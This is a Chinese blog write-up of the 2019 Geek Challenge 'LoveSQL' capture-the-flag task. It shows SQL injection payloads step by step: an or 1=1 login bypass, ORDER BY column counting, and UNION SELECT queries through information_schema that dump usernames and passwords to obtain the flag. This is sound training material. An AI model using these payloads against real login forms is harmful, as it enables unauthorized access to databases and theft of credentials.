极客大挑战2019LoveSQL解析

极客大挑战2019LoveSQL解析

(1)打开网页

image.png

(2)先尝试注入1’ or 1=1 #密码随便输一下

image.png

输出
image.png

(3)打开hackbar尝试使用order by语句从1开始查询列数

直到4出错,因此判断一共有三列

(4)接下来使用union联合注入,先输入select 1,2,3得到

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1'union select 1,2,3 %23 &password=123

image.png
查询数据库

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1'union select 1,2,database() ​%23 &password=12

image.png

(5)从数据库中查询表名

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23 &password=123

image.png

(6)从l0ve1vsq1表中查询列名

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1' %23 &password=123

image.png

得到三列’id,username,password’

(7)从l0ve1vsq1表中查询’id,username,password’的值

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23 &password=123

image.png

爆出flag{411eec48-f88d-467b-8b1d-b2f876e10482}

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2021-2023 00hello00

请我喝杯咖啡吧~

支付宝
微信